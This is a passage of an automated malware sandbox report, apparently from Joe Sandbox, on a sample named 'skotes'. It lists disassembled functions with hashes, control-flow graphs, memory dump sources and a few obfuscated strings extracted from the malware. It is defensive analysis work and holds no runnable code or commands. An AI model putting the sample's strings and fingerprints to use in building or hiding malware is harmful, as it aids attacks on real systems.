                                                • Opcode Fuzzy Hash: 155817035049c5ca7aeaa619b2aaa394aa421b1cebaad954cb9ee5f21750ee2d
                                                • Instruction Fuzzy Hash: EBF0D6B1A40614E7C6147B7C9C0671E7B74AB06771F904648E811772D2E7381A0187D3
                                                Function 04B40B99 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1435 4b40b99-4b40b9a 1436 4b40b9c-4b40ba7 call 4b40bb7 1435->1436 1437 4b40c0f 1435->1437 1438 4b40bf5-4b40c0a 1436->1438 1437->1438 1439 4b40c11-4b40c18 1437->1439 1443 4b40c1a 1438->1443 1442 4b40c1f-4b40c24 1439->1442 1439->1443 1445 4b40c2f-4b40cb4 1442->1445 1443->1445 1451 4b40cba-4b40ce2 1445->1451
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5a96d860c82429a2a02a933f5f1ac0eda4bb0eb7481fbb375727b3d40799c04
                                                • Instruction ID: 2a4bb1556fbdba679eff4f6d27b977088f859ab8419b0214ca1c9dde2cd488ab
                                                • Opcode Fuzzy Hash: d5a96d860c82429a2a02a933f5f1ac0eda4bb0eb7481fbb375727b3d40799c04
                                                • Instruction Fuzzy Hash: F401686720F654FEA20232816F18AB97A18EAD733133084EEFB87C9603E65125C5F577
                                                Function 04B40C2A Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1454 4b40c2a-4b40c2c 1455 4b40c2e 1454->1455 1456 4b40c38-4b40c3f 1454->1456 1457 4b40bcd-4b40c1a 1455->1457 1458 4b40c2f-4b40c33 1455->1458 1459 4b40c41-4b40cb4 1456->1459 1457->1458 1458->1459 1469 4b40cba-4b40ce2 1459->1469
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 386c4b3ef8da6036f4fc02a0eeefa3522dda0f34fc8297a63eca685725d13e87
                                                • Instruction ID: 18959043874963d42cd3ffb4edaa86f7598221cdd0b904bf5397fbe09e84a08f
                                                • Opcode Fuzzy Hash: 386c4b3ef8da6036f4fc02a0eeefa3522dda0f34fc8297a63eca685725d13e87
                                                • Instruction Fuzzy Hash: C801706B30F151FD52027581BB05ABD7E2ED6C633033084E6FB87C9503F255299571B2
                                                Function 04B40BB7 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1488 4b40bb7-4b40ce2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17d7629207b2e97a3b45314596c3151fe01109f5022ba1bf90de2e5a39c50ace
                                                • Instruction ID: 26e17a58e6ca28de9867b6c4af770cb9e59af975b83725f96c591dd1904e1da0
                                                • Opcode Fuzzy Hash: 17d7629207b2e97a3b45314596c3151fe01109f5022ba1bf90de2e5a39c50ace
                                                • Instruction Fuzzy Hash: 7601F4AB31E221FD610235857B109F97B2EE6D733133084E6FB47C9A03F29529847072
                                                Function 04B40BAE Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1472 4b40bae-4b40cb4 1485 4b40cba-4b40ce2 1472->1485
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95a60817f8cfc6c7b2952e52ee8fd160a7e1cac56f62b6e7bf44fa246e357285
                                                • Instruction ID: 07fe1c0ab9cb0406fd23a661647e3f71a369d7e33e18c6f6f9fd5cc86e1b1775
                                                • Opcode Fuzzy Hash: 95a60817f8cfc6c7b2952e52ee8fd160a7e1cac56f62b6e7bf44fa246e357285
                                                • Instruction Fuzzy Hash: 5C0126A731E221FD51023A856B109B97A2DE6E733033085E6FB47C9603F3A5299475B2
                                                Function 04B40BC3 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1504 4b40bc3-4b40cb4 1517 4b40cba-4b40ce2 1504->1517
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e57d544346bb9d0d5bfbb694ec8ecf9179a3d362aac91eb68562c635c7007ff
                                                • Instruction ID: bb46bd4b86146ad2bc4d9c71afd9d8fe240efeb2c686fc60b0d48f6a795dab6e
                                                • Opcode Fuzzy Hash: 8e57d544346bb9d0d5bfbb694ec8ecf9179a3d362aac91eb68562c635c7007ff
                                                • Instruction Fuzzy Hash: 4D01206630E251FE9202764167019BD7B6EE6C733033044EABA87C5603E2651554B172
                                                Function 04B40BE4 Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd085fc2315eb3037da7a3863454fe64b74ce701c66da817b7ce0552f4e076c5
                                                • Instruction ID: 51af451e46c1109495c5caccb2e9ea802c51ba735728d51a700e797c2301dbae
                                                • Opcode Fuzzy Hash: fd085fc2315eb3037da7a3863454fe64b74ce701c66da817b7ce0552f4e076c5
                                                • Instruction Fuzzy Hash: 75012DB730E266FD520376816B019BDBB2DEAD637033044A5FB87CA503F29565547172
                                                Function 04B40BF4 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0b5582106d728bda72cbe4cde7f813d72c694b61571c6fbd1da59466ecc5fa1
                                                • Instruction ID: a73b23894a06d832536b419579ab4d05332e27a827832df781b157d8ad899721
                                                • Opcode Fuzzy Hash: e0b5582106d728bda72cbe4cde7f813d72c694b61571c6fbd1da59466ecc5fa1
                                                • Instruction Fuzzy Hash: 41F0286730F150FE56022581BB049B9BB28EACA33033084EAFB87CA103E2A51590B573
                                                Function 04B40C72 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dc158d9ba2bd510fa20465372a2556dee6ae6aa641f66fef5b9a9c2532c40f4
                                                • Instruction ID: abbb30a50d87b03e60de83b96633b605ee460087633dac6b1c1edc4b9f20fe47
                                                • Opcode Fuzzy Hash: 0dc158d9ba2bd510fa20465372a2556dee6ae6aa641f66fef5b9a9c2532c40f4
                                                • Instruction Fuzzy Hash: F7F0216731E151FD67027991BA109FA3B29D9C67303308896F786C6513E2652885F572
                                                Function 04B40C55 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d35220bc8a718398600154d6a432edc95f257674fb4ddd9550bd8cc4dcafd5e2
                                                • Instruction ID: af35715dd58ee9eaac234f4847b4ec85e006b309fd20c73f4f00ea25e542de90
                                                • Opcode Fuzzy Hash: d35220bc8a718398600154d6a432edc95f257674fb4ddd9550bd8cc4dcafd5e2
                                                • Instruction Fuzzy Hash: 3EE0E52730A205EEC6023A91BB146BA7B65EBDA32173045A1F6C2DA642E2A11085B692
                                                Function 04B40C88 Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83ffa9709553790d02387838ab4d9e5305dffa3572c483a87b7d9e0d99b54d23
                                                • Instruction ID: a3488e7343c38b1712a80d97458233ab956f2610a41771aefa82d053b142c361
                                                • Opcode Fuzzy Hash: 83ffa9709553790d02387838ab4d9e5305dffa3572c483a87b7d9e0d99b54d23
                                                • Instruction Fuzzy Hash: 63D0C21720A250E642033AE1624007979A6BD9723233404A5B782C9707E19A0080B663
                                                Function 04B40CA9 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13b54e5c7bc54e7dbe236157f5372239a5df3d11a1e3e6d87ff52d667ac08b6b
                                                • Instruction ID: 93878283d58de3eabbff676634079dc49ae10e9b72948f73b20d58b5067425fe
                                                • Opcode Fuzzy Hash: 13b54e5c7bc54e7dbe236157f5372239a5df3d11a1e3e6d87ff52d667ac08b6b
                                                • Instruction Fuzzy Hash: B9D0223370B220C783033CE211A01AA7083ADC36603F110B96143C7F8BF2879090B850

                                                Non-executed Functions

                                                Function 0072E530 Relevance: 16.0, Strings: 12, Instructions: 968COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1x$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                • API String ID: 0-385277979
                                                • Opcode ID: dfa7f49134b3774b525025dea2a0678f6d350a0ae708390af2396e277f6dc6ef
                                                • Instruction ID: 7967f13cf9e1e4d9af0b83e8496aef710cb3dacba5ebebdea10dc8602c201770
                                                • Opcode Fuzzy Hash: dfa7f49134b3774b525025dea2a0678f6d350a0ae708390af2396e277f6dc6ef
                                                • Instruction Fuzzy Hash: A182B370A04288DBEF18EF68C9497DE7FB5AB45304F508598E805673C3D7795A88CBD2
                                                Function 007631A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: ca1313b2a7813e62e95c85987b7c920727e85457af6a47a033d4cf194be3ff32
                                                • Instruction ID: cf968aa18e924500aca0fc927347a81721c8043c68f52237ae4307488812b506
                                                • Opcode Fuzzy Hash: ca1313b2a7813e62e95c85987b7c920727e85457af6a47a033d4cf194be3ff32
                                                • Instruction Fuzzy Hash: 02C23871E086288FDB25CE28DD407EAB7B5EB48345F1441EAD84EE7241E779AE85CF40
                                                Function 00762D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                • Instruction ID: a300056124b755d5b2995343648607b02e9c7f26df2352ed20f8b338239cbe8c
                                                • Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                • Instruction Fuzzy Hash: 54F14F71E006199FDF14CFA8C9806ADF7B1FF49314F258269E81AAB345D735AE05CB90
                                                Function 0073CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,0073CF52,?,?,?,?,0073CF87,?,?,?,?,?,?,0073C4FD,?,00000001), ref: 0073CC03
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Time$FilePreciseSystem
                                                • String ID:
                                                • API String ID: 1802150274-0
                                                • Opcode ID: 05951c46ae1e30e84c075be4ec7d1e10b7af3d40ea22c51d46e448cbe111d366
                                                • Instruction ID: 485c223c2ac1686d85f1741de28b320d0d7b67fa7a29553b2c874cbd4c0db6f8
                                                • Opcode Fuzzy Hash: 05951c46ae1e30e84c075be4ec7d1e10b7af3d40ea22c51d46e448cbe111d366
                                                • Instruction Fuzzy Hash: 0FD0223254313897AA022B84EC008ADBB88DF00B547009111EE0D33122CA19AC405BEA
                                                Function 00757F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                • Instruction ID: e0ec63be924616536906e65cc1d99e74fe2c659e290fbd8910423cc994b45ae9
                                                • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                • Instruction Fuzzy Hash: 0A5139302086489BEBBC9A2898997FE67969B01302F14051DEC86F72D1CEDE9D4FC353
                                                Function 00724DE0 Relevance: .7, Instructions: 701COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17f817b487406906f7b93daf123e709dfe11eb3f44b7f0943133cd473f2647ca
                                                • Instruction ID: ca23007fc07b6762b021220f8091c8f19c373608b7fb65c76ee4f3cc6058c2f3
                                                • Opcode Fuzzy Hash: 17f817b487406906f7b93daf123e709dfe11eb3f44b7f0943133cd473f2647ca
                                                • Instruction Fuzzy Hash: 202261B3F515144BDB4CCB5DDCA27ECB2E3AFD8214B1E803DA40AE3345EA79D9158648
                                                Function 00767049 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72713ed31ada52e9280b813aec22c58bdf47c64e0ac3f0f1a643fd41b35737b0
                                                • Instruction ID: a23792a34412cca0ac4873c11894b58e9ef6c4efb3d88462007480263f5dd011
                                                • Opcode Fuzzy Hash: 72713ed31ada52e9280b813aec22c58bdf47c64e0ac3f0f1a643fd41b35737b0
                                                • Instruction Fuzzy Hash: DAB13D31614608DFD719CF28C496B657BB1FF453A8F258659EC9ACF2A1C339E982CB40
                                                Function 00724B30 Relevance: .2, Instructions: 230COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f90ce5ba76c86ab5fc473c8a10efec46de8ab721c3c0af5cd3f217c59a226644
                                                • Instruction ID: 7fe848153a394d666b5ba21de5948b321b5c780c98f05efe261acd5fd4e4dff2
                                                • Opcode Fuzzy Hash: f90ce5ba76c86ab5fc473c8a10efec46de8ab721c3c0af5cd3f217c59a226644
                                                • Instruction Fuzzy Hash: C881FE71E002658FEB15CF68E8907EEBBF1BB19300F1442A9D950A7353D7399986CBA0
                                                Function 0073D3E2 Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                APIs
